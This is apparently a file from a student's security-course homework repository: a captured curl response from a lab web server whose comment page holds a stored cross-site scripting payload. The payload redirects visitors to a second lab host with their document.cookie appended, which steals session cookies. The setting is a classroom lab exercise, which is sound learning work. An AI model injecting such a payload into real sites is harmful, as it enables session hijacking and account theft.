csci5271/ha2/5/comment.html
Michael Zhang d7cb704a4a
f
2018-01-29 17:30:43 -06:00

20 lines
408 B
HTML

student@xenial64s:~$ curl -k https://192.168.16.1/comment/comment.php?c_id=73
<!doctype html>
<head>
<title>Comment</title>
</head>
<body>
<strong>Comment</strong>: <script>location.href="http://192.168.16.3/?" + encodeURI(document.cookie);</script>
<br><br><br>Go <a href="/comment">back</a> to read the rest of the comments.<br>
Lost? Home is <a href="/index.php">this</a> way.
</body>
</html>